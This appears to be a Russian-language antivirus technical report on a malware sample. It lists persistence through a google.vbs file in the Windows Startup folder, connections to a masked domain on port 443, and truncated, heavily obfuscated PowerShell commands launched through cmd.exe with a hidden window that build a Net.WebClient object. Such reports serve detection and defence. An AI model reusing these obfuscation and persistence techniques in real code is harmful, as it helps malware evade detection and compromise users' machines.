Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\google.vbs
Сетевая активность
Подключается к
- 'go##el.com':443
TCP
Другие
- 'go##el.com':443
UDP
- DNS ASK go##el.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerSheLl $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerSheLl $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Command=((n`e`W`-Obj`E`c`T (('N'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'e'+'t'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'e'+'b'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'c'+'l'+'...
